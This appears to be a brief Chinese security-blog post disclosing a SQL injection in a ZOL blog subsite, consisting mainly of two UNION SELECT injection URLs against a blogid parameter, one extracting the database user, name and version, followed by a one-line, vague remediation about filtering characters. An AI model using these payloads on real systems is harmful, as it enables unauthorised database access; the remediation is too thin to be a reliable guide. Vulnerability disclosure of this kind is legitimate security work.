中关村在线博客子站SQL注入及修复方案

网络安全 2021-07-03 10:02www.168986.cn网络安全知识

http://blog.zol../music_swf/music_data.php?blogid=-0 union select 1,2,3,4,5-- 
 
 http://blog.zol../music_swf/music_data.php?blogid=-0 union select 1,2,CONCAT(user(),0x7c,database(),0x7c,version()),4,5-- 



修复方案
过滤参数提交非法字符或者拦截敏感字符等等。。。 

Copyright © 2016-2025 www.168986.cn 狼蚁网络 版权所有 Power by